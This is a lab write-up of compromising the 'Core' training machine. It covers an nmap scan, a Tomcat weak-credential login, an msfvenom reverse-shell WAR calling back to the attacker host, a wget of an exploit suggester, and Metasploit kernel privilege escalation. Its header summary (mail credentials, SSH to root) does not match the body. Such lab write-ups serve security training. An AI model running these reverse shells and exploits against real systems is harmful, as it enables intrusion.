WriteupsVHL — Core
MiscEasyLinux
VHL — Core
Legacy Ubuntu server with Apache 2.2 and Dovecot POP3. Enumerated mail service for credentials enabling SSH access to root.
February 16, 2025Virtual Hacking Labs
#Apache#POP3#Dovecot#Credential Enum
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:21 EST
Nmap scan report for 10.11.1.160
Host is up (0.022s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 de:31:a4:e4:f8:c6:58:93:47:b8:2a:52:00:aa:f3:fd (DSA)
|_ 2048 86:39:8e:7b:f4:8d:c8:e9:92:a2:f9:c4:c2:97:b1:98 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA STLS SASL PIPELINING RESP-CODES UIDL
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
|_imap-capabilities: LOGIN-REFERRALS Capability NAMESPACE OK ID ESEARCH LOGINDISABLEDA0001 STARTTLS THREAD=REFERENCES LITERAL+ SORT=DISPLAY IDLE CONTEXT=SEARCH MULTIAPPEND SASL-IR CHILDREN I18NLEVEL=1 SORT ESORT WITHIN UNSELECT QRESYNC THREAD=REFS SEARCHRES CONDSTORE LIST-EXTENDED completed ENABLE IMAP4rev1 UIDPLUS
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2025-02-16T20:21:48+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
| sslv2:
| SSLv2 supported
|_ ciphers: none
|_imap-capabilities: LOGIN-REFERRALS NAMESPACE Capability ID ESEARCH OK AUTH=PLAINA0001 THREAD=REFERENCES LITERAL+ SORT=DISPLAY IDLE CONTEXT=SEARCH MULTIAPPEND SASL-IR CHILDREN I18NLEVEL=1 SORT ESORT WITHIN UNSELECT QRESYNC THREAD=REFS SEARCHRES CONDSTORE LIST-EXTENDED completed ENABLE IMAP4rev1 UIDPLUS
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: CORE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 22.44 ms 10.11.1.160
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.45 seconds
80
sh
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).8080
weak creds
tomcat:s3cret
sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.1 LPORT=443 -f war > rev.wa
sh
rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.160] 59221
whoami
tomcat6sh
python3 -c 'import pty; pty.spawn("/bin/bash")'priv esc
sh
tomcat6@core:/$ uname -a
uname -a
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linuxsh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 1158/java
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 1158/java sh
╔══════════╣ Useful software
/usr/bin/authbind
/usr/bin/base64
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wgetpt_chown SUID
sh
-rwsr-xr-x 1 root root 9.5K 2010-04-22 13:15 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc 19467.c -o 19467sh
tomcat6@core:/tmp$ ls -l /usr/lib/pt_chown
ls -l /usr/lib/pt_chown
-rwsr-xr-x 1 root root 9676 2010-04-22 13:15 /usr/lib/pt_chown
tomcat6@core:/tmp$ ls -l /dev/pts/
ls -l /dev/pts/
total 0
crw--w---- 1 tomcat6 tty 136, 0 2025-02-16 16:10 0
c--------- 1 root root 5, 2 2025-02-16 15:20 ptmxlinux exploit suggester
sh
wget http://172.16.1.1/linux-exploit-suggester.sh
--2025-02-16 16:22:50-- http://172.16.1.1/linux-exploit-suggester.sh
Connecting to 172.16.1.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90858 (89K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'
100%[======================================>] 90,858 --.-K/s in 0.07s
2025-02-16 16:22:50 (1.23 MB/s) - `linux-exploit-suggester.sh' saved [90858/90858]
tomcat6@core:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
tomcat6@core:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.32
Architecture: i686
Distribution: ubuntu
Distribution version: 10.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},[ ubuntu=10.04 ]{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: probable
Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: probable
Tags: [ ubuntu=10.04 ]
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},[ ubuntu=(10.04|10.10) ]{kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: probable
Tags: [ ubuntu=10.04 ]{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-0832] PAM MOTD
Details: https://www.exploit-db.com/exploits/14339/
Exposure: probable
Tags: [ ubuntu=9.10|10.04 ]
Download URL: https://www.exploit-db.com/download/14339
Comments: SSH access to non privileged user is needed
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-1146] reiserfs
Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://jon.oberheide.org/files/team-edward.py
rds CVE-2010-3904
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc 15285.c -o 15285metasploit (post/multi/recon/local_exploit_suggester)
sh
msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=443 -f war > rev2.warsh
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=truesh
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[*] 10.11.1.160 - Collecting local exploits for java/linux...
[*] 10.11.1.160 - 198 exploit checks are being tried...
[+] 10.11.1.160 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The service is running, but could not be validated. /bin/ping is not setuid
This module attempts to gain root privileges on Linux systems by
abusing a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does
not properly restrict use of the LD_AUDIT environment variable when
loading setuid executables. This allows loading arbitrary shared
objects from the trusted library search path with the privileges of
the suid user. This module uses LD_AUDIT to load the libpcprofile.so
shared object, distributed with some versions of glibc, and
leverages arbitrary file creation functionality in the library
constructor to write a root-owned world-writable file to a system
trusted search path (usually /lib). The file is then overwritten
with a shared object then loaded with LD_AUDIT resulting in
arbitrary code execution. This module has been tested successfully
on glibc version 2.11.1 on Ubuntu 10.04 x86_64 and version 2.7 on
Debian 5.0.4 i386. RHEL 5 is reportedly affected, but untested. Some
glibc distributions do not contain the libpcprofile.so library
required for successful exploitation.
[+] 10.11.1.160 - exploit/linux/local/glibc_origin_expansion_priv_esc: The service is running, but could not be validated. /bin/ping is not setuid
This module attempts to gain root privileges on Linux systems by
abusing a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does
not properly restrict use of the `LD_AUDIT` environment variable
when loading setuid executables which allows control over the
`$ORIGIN` library search path resulting in execution of arbitrary
shared objects. This module opens a file descriptor to the specified
suid executable via a hard link, then replaces the hard link with a
shared object before instructing the linker to execute the file
descriptor, resulting in arbitrary code execution. The specified
setuid binary must be readable and located on the same file system
partition as the specified writable directory. This module has been
tested successfully on: glibc 2.5 on CentOS 5.4 (x86_64); glibc 2.5
on CentOS 5.5 (x86_64); glibc 2.12 on Fedora 13 (i386); and glibc
2.5-49 on RHEL 5.5 (x86_64). Some versions of `ld.so`, such as the
version shipped with Ubuntu 14, hit a failed assertion in
`dl_open_worker` causing exploitation to fail.
[+] 10.11.1.160 - exploit/linux/local/pkexec: The target appears to be vulnerable.
A race condition flaw was found in the PolicyKit pkexec utility and
polkitd daemon. A local user could use this flaw to appear as a
privileged user to pkexec, allowing them to execute arbitrary
commands as root by running those commands with pkexec. Those
vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
[+] 10.11.1.160 - exploit/linux/local/rds_rds_page_copy_user_priv_esc: The target appears to be vulnerable.
This module exploits a vulnerability in the `rds_page_copy_user`
function in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30
to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This module
has been tested successfully on: Fedora 13 (i686) kernel version
2.6.33.3-85.fc13.i686.PAE; and Ubuntu 10.04 (x86_64) with kernel
version 2.6.32-21-generic.
[+] 10.11.1.160 - exploit/linux/local/su_login: The target appears to be vulnerable.
This module attempts to create a new login session by invoking the
su command of a valid username and password. If the login is
successful, a new session is created via the specified payload.
Because su forces passwords to be passed over stdin, this module
attempts to invoke a psuedo-terminal with python, python3, or
script.
[+] 10.11.1.160 - exploit/linux/local/tomcat_ubuntu_log_init_priv_esc: The target appears to be vulnerable. Vulnerable app version detected: 6.0.24.pre.2ubuntu1
Tomcat (6, 7, 8) packages provided by default repositories on
Debian-based distributions (including Debian, Ubuntu etc.) provide a
vulnerable tomcat init script that allows local attackers who have
already gained access to the tomcat account (for example, by
exploiting an RCE vulnerability in a java web application hosted on
Tomcat, uploading a webshell etc.) to escalate their privileges from
tomcat user to root and fully compromise the target system. Tested
against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04
[*] Running check method for exploit 64 / 64
[*] 10.11.1.160 - Valid modules for session 4:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/glibc_ld_audit_dso_load_priv_esc Yes The service is running, but could not be validated. /bin/ping is not setuid
2 exploit/linux/local/glibc_origin_expansion_priv_esc Yes The service is running, but could not be validated. /bin/ping is not setuid
3 exploit/linux/local/pkexec Yes The target appears to be vulnerable.
4 exploit/linux/local/rds_rds_page_copy_user_priv_esc Yes The target appears to be vulnerable.
5 exploit/linux/local/su_login Yes The target appears to be vulnerable.
6 exploit/linux/local/tomcat_ubuntu_log_init_priv_esc Yes The target appears to be vulnerable. Vulnerable app version detected: 6.0.24.pre.2ubuntu1sh
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > use exploit/linux/local/rds_rds_page_copy_user_priv_escsh
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 4
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.1.1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
Up next
MediumFeb 2025
VHL — FW01
IPFire firewall appliance with DNSmasq on port 53. Default/weak credentials on the admin panel lead to command execution.
Read writeup
MediumFeb 2025
VHL — Graphs01
Cacti network monitoring on Ubuntu. Exploited CVE-2022-46169 unauthenticated RCE in Cacti for initial shell access.
Read writeup
MediumFeb 2025
VHL — Mon02
Centreon IT monitoring platform on Red Hat. Default credentials lead to authenticated RCE via malicious poller command injection.
Read writeup